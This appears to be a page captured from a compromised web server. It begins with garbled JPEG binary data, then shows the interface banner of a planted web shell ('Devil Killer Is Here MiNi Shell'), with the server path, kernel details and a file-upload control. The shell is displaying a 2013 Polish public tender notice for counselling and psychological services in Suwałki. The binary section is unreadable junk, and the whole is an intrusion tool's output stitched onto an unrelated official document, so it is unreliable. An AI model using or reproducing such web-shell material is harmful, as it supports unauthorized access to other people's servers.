JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130508/181364-N-2013.html

<p class="kh_header"><b>Suwałki: Usługi doradcze indywidualne i grupowe psychologiczne oraz z zakresu poradnictwa zawodowego dla uczestników projektu PO KL KORKOCIĄG.Wypłyń na głebię! współfinansowanego ze środków Unii Eurupejskiej w ramach Europejskiego Funduszu Społecznego, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Suwałkach.</b><br>
<b>Numer ogłoszenia: 181364 - 2013; data zamieszczenia: 08.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Świerkowa 60, 16-400 Suwałki, woj. podlaskie, tel. 0-87 565 92 80, faks 0-87565 92 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pcpr.powiat.suwalski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze indywidualne i grupowe psychologiczne oraz z zakresu poradnictwa zawodowego dla uczestników projektu PO KL KORKOCIĄG.Wypłyń na głebię! współfinansowanego ze środków Unii Eurupejskiej w ramach Europejskiego Funduszu Społecznego, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Suwałkach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 Indywidualne i grupowe doradztwo zawodowe dla osób z orzeczeniem o stopniu niepełnosprawności.  Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 13 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 26 godzin dydaktycznych zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia stażu zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.

Część 2 Indywidualne i grupowe doradztwo zawodowe dla osób z orzeczeniem o stopniu niepełnosprawności .  Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 13 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 26 godzin dydaktycznych zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia stażu zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.
Część 3 Indywidualne i grupowe doradztwo zawodowe dla osób z orzeczeniem o stopniu niepełnosprawności.  Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 12 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 24 godziny dydaktyczne zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia stażu zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.
Część 4 Indywidualne i grupowe doradztwo zawodowe dla osób z orzeczeniem o stopniu niepełnosprawności.  Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 16 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 32 godziny dydaktyczne zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia staży zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.
Część 5 Indywidualne i grupowe doradztwo zawodowe dla osób bezrobotnych oraz zagrożonych utratą pracy. Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 13 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 26 godzin dydaktycznych zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia stażu zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.
Część 6 Indywidualne i grupowe doradztwo zawodowe dla osób bezrobotnych zagrożonych utratą pracy.  Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 13 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 26 godzin dydaktycznych zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia stażu zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.
Część 7 Indywidualne i grupowe doradztwo zawodowe dla osób bezrobotnych zagrożonych utratą pracy.  Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 13 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 26 godzin dydaktycznych zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia stażu zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.
Część 8 Indywidualne i grupowe doradztwo zawodowe dla osób bezrobotnych zagrożonych utratą pracy  oraz dla usamodzielniających się wychowanków Domu Dziecka i rodzin zastępczych. Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 12 osób. 
b Przeprowadzenie indywidualnych konsultacji z zakresu doradztwa zawodowego w ilości 2 godzin dydaktycznych na jednego uczestnika- łącznie 24 godzin dydaktycznych zajęć. Sporządzenie dla każdego uczestnika indywidualnej opinii doradcy zawodowego w której wskazane będą kierunki szkoleń mających na celu podwyższenie kwalifikacji zawodowych uczestnika oraz możliwości podjęcia stażu zawodowego.  
c Przeprowadzenie warsztatów aktywnego poszukiwania pracy oraz autoprezentacji wobec pracodawcy w formie warsztatu grupowego- 6 godzin dydaktycznych oraz co najmniej jedna 15- minutowa przerwa. Celem działania jest zapoznanie uczestników z metodami poszukiwania pracy, sporządzenie wzoru dokumentów aplikacyjnych oraz autoprezentacja w procesie kwalifikacyjnym na rynku pracy.  Wykonawca ma opracować program warsztatu dla danej grupy z uwzględnieniem potrzeb i możliwości uczestników.
Przewidywany termin realizacji zamówienia: 4 tygodnie od dnia podpisania umowy.
Część 9 Indywidualne konsultacje z doradcą edukacyjnym dla osób z grupy młodzieży 
w rodzinach zastępczych. Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 14 osób. 
a Przeprowadzenie działań z zakresu doradztwa edukacyjnego dla uczących się na poziomie gimnazjum i szkoły średniej uczestników projektu.
b Sporządzenie dla każdej osoby indywidualnego planu działania, który zawierać będzie plan ścieżki edukacyjnej i zawodowej uczestnika. W przypadku osób kontynuujących udział w projekcie  możliwe sporządzenie aktualizacji indywidualnego planu działania. 
c Sporządzenie dla każdej osoby diagnozy potrzeb edukacyjnych i zawodowych. 
d ilość przewidywanych godzin: do 3 godzin dydaktycznych na jedną osobę- w zależności od indywidualnych potrzeb uczestnika, przewidywane do 42 godziny w zakresie przedmiotu zamówienia.  

Przewidywany termin realizacji zamówienia: 5 tygodni od dnia podpisania umowy.
Część 10 Konsultacje indywidualne z psychologiem dla uczestników z grupy osób  niepełnosprawnych. Kategoria słownika CPV- 85121270-6
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 27 osób. 
b Przeprowadzenie indywidualnych konsultacji psychologicznych w ilości do 2 godzin dydaktycznych na jednego uczestnika, w zależności od jego indywidualnych potrzeb- łącznie przewiduje się do 54 godzin dydaktycznych zajęć. 
c Sporządzenie dla każdego uczestnika karty, indywidualnych konsultacji psychologicznych, w której wskazane będzie plan spotkania oraz kierunek dalszego uczestnictwa w treningu kompetencji i umiejętności społecznych. 
 Przewidywany termin realizacji zamówienia: 6 tygodni od dnia podpisania umowy.

Część 11 Konsultacje indywidualne z psychologiem dla uczestników z grupy osób  niepełnosprawnych. Kategoria słownika CPV- 85312510-7
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 27 osób. 
b Przeprowadzenie indywidualnych konsultacji psychologicznych w ilości do 2 godzin dydaktycznych na jednego uczestnika, w zależności od jego indywidualnych potrzeb- łącznie przewiduje się do 54 godzin dydaktycznych zajęć. 
c Sporządzenie dla każdego uczestnika karty indywidualnych konsultacji psychologicznych w której wskazane będzie plan spotkania oraz kierunek dalszego uczestnictwa w treningu kompetencji i umiejętności społecznych. 
Przewidywany termin realizacji zamówienia: 6 tygodni od dnia podpisania umowy.
Część 12 Konsultacje indywidualne z psychologiem dla uczestników z grupy osób  bezrobotnych i zagrożonych utratą pracy. Kategoria słownika CPV- 85121270-6
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 26 osób. 
b Przeprowadzenie indywidualnych konsultacji psychologicznych w ilości do 2 godzin dydaktycznych na jednego uczestnika, w zależności od jego indywidualnych potrzeb- łącznie przewiduje się do 52 godzin dydaktycznych zajęć. 
c Sporządzenie dla każdego uczestnika karty indywidualnych konsultacji psychologicznych, w której wskazane będzie plan spotkania oraz kierunek dalszego uczestnictwa w treningu kompetencji i umiejętności społecznych. 
Przewidywany termin realizacji zamówienia: 6 tygodni od dnia podpisania umowy.
Część 13 Konsultacje indywidualne z psychologiem dla uczestników z grupy osób  bezrobotnych i zagrożonych utratą pracy oraz usamodzielniających się wychowanków z Domu Dziecka i rodzin zastępczych. Kategoria słownika CPV- 85121270-6
Zakres przewidywanych zadań obejmuje:
a przewidywana liczba uczestników- 25 osób. 
b Przeprowadzenie indywidualnych konsultacji psychologicznych w ilości do 2 godzin dydaktycznych na jednego uczestnika, w zależności od jego indywidualnych potrzeb- łącznie przewiduje się do 50 godzin dydaktycznych zajęć. 
c Sporządzenie dla każdego uczestnika karty indywidualnych konsultacji psychologicznych w której wskazane będzie plan spotkania oraz kierunek dalszego uczestnictwa w treningu kompetencji i umiejętności społecznych. 
Przewidywany termin realizacji zamówienia: 6 tygodni od dnia podpisania umowy.

Część 14 Trening kompetencji i umiejętności społecznych dla uczestników projektu KORKOCIĄG. Wypłyń na głębię!. Kategoria słownika CPV- 85121270-6
Zakres przewidywanych zadań obejmuje:
1Przewidywana liczba uczestników 26 osób w podziale na dwie grupy. 
2Dla każdej grupy przewidziany jest cykl 4 spotkań. Każde spotkanie powinno trwać 4 godziny dydaktyczne zajęć oraz jedna 15- minutowa przerwa.  
3Wykonawca ma opracować program i zrealizować trening dla grupy z uwzględnieniem potrzeb i możliwości uczestników, którego celem będzie zwiększenie ich aktywności społecznej i zawodowej. 
Przewidywany termin realizacji zamówienia: 10 tygodni od dnia podpisania umowy.
Część 15 Trening kompetencji i umiejętności społecznych dla uczestników projektu KORKOCIĄG. Wypłyń na głębię!. Kategoria słownika CPV- 85121270-6 
Zakres przewidywanych zadań obejmuje:
1Przewidywana liczba uczestników 26 osób w podziale na dwie grupy. 
2Dla każdej grupy przewidziany jest cykl 4 spotkań. Każde spotkanie powinno trwać 4 godziny dydaktyczne zajęć oraz jedna 15- minutowa przerwa.  
3Wykonawca ma opracować program i zrealizować trening dla grupy z uwzględnieniem potrzeb i możliwości uczestników, którego celem będzie zwiększenie ich aktywności społecznej i zawodowej. 
Przewidywany termin realizacji zamówienia: 10 tygodni od dnia podpisania umowy.

Część 16 Trening kompetencji i umiejętności społecznych dla uczestników projektu KORKOCIĄG. Wypłyń na głębię!. Kategoria słownika CPV- 85121270-6
Zakres przewidywanych zadań obejmuje:
1Przewidywana liczba uczestników 26 osób w podziale na dwie grupy. 
2Dla każdej grupy przewidziany jest cykl 4 spotkań. Każde spotkanie powinno trwać 4 godziny dydaktyczne zajęć oraz jedna 15- minutowa przerwa.  
3Wykonawca ma opracować program i zrealizować trening dla grupy z uwzględnieniem potrzeb i możliwości uczestników, którego celem będzie zwiększenie ich aktywności społecznej i zawodowej. 
Przewidywany termin realizacji zamówienia: 10 tygodni od dnia podpisania umowy.
Część 17 Trening kompetencji i umiejętności społecznych dla uczestników projektu KORKOCIĄG. Wypłyń na głębię!. Kategoria słownika CPV- 85121270-6 
Zakres przewidywanych zadań obejmuje:
1Przewidywana liczba uczestników 27 osób w podziale na dwie grupy. 
2Dla każdej grupy przewidziany jest cykl 4 spotkań. Każde spotkanie powinno trwać 4 godziny dydaktyczne zajęć oraz jedna 15- minutowa przerwa.  
3Wykonawca ma opracować program i zrealizować trening dla grupy z uwzględnieniem potrzeb i możliwości uczestników, którego celem będzie zwiększenie ich aktywności społecznej i zawodowej. 
Przewidywany termin realizacji zamówienia: 10 tygodni od dnia podpisania umowy.
Część 18. Terapia psychospołeczna oraz trening kompetencji i umiejętności społecznych dla grupy młodzieży w rodzinach zastępczych . Kategoria słownika CPV- 85121270-6
Zakres przewidywanych zadań obejmuje:
1Przewidywana liczba uczestników- 14 osób
2Przeprowadzenie indywidualnych spotkań z uczestnikami projektu i konsultacji  z ich rodzinami oraz dokonanie oceny funkcjonowania społecznego uczestników projektu i ich rodzin- średnio po 5 godzin dydaktycznych na jednego uczestnika rodzinę (w zależności od indywidualnych potrzeb uczestnika)- łącznie przewidywane do 70 
godz. dyd. zajęć.  
Przewidywany termin realizacji zamówienia: od 27 maja do 06 grudnia 2013r. 
3  Przeprowadzenie grupowego treningu kompetencji i umiejętności społecznych- cykl 4   spotkań trwających po 6 godzin dydaktycznych każde- łącznie 24 godz. dyd. zajęć.  Wykonawca ma opracować program i przeprowadzić trening dla grupy z uwzględnieniem potrzeb i możliwości uczestników, którego celem będzie zwiększenie ich aktywności społecznej i zawodowej. 
            Przewidywany termin realizacji zamówienia: 10 tygodnie od dnia podpisania umowy.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego na podstawie art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.10-7, 85.12.12.70-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania uprawnień do wykonywania określonej czynności zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadanie wiedzy i doświadczenia zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony,  jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku oraz dołączy wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.

Dla części od 1 do 8 przedmiotu zamówienia Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, iż osoby wykonujące zadania posiadają licencję doradcy zawodowego, zgodnie z ustawą o promocji zatrudnienia i instytucjach rynku pracy oraz posiadają co najmniej 24 miesięczny w ostatnich 5 latach staż pracy w zawodzie doradcy zawodowego.

Dla części 9 przedmiotu zamówienia Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, iż osoby wykonujące zadania posiadają wykształcenie wyższe   i studia podyplomowe z zakresu poradnictwa zawodowego lub broker edukacyjny, oraz posiadają doświadczenie w pracy doradcy zawodowego oraz pracy z młodzieżą w wieku szkolnym. 
Dla części od 10 do 17 przedmiotu zamówienia Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, iż osoby wykonujące zadania posiadają wykształcenie wyższe psychologiczne oraz posiadają co najmniej 24 miesięczny w ostatnich 5 latach staż pracy w zawodzie psychologa.

Dla części 18 przedmiotu zamówienia Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, iż osoby wykonujące zadania posiadają wykształcenie wyższe psychologiczne, specjalistyczny kurs z zakresu terapii rodzinnej oraz posiadają co najmniej 24 miesięczny w ostatnich 5 latach staż pracy w zawodzie psychologa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

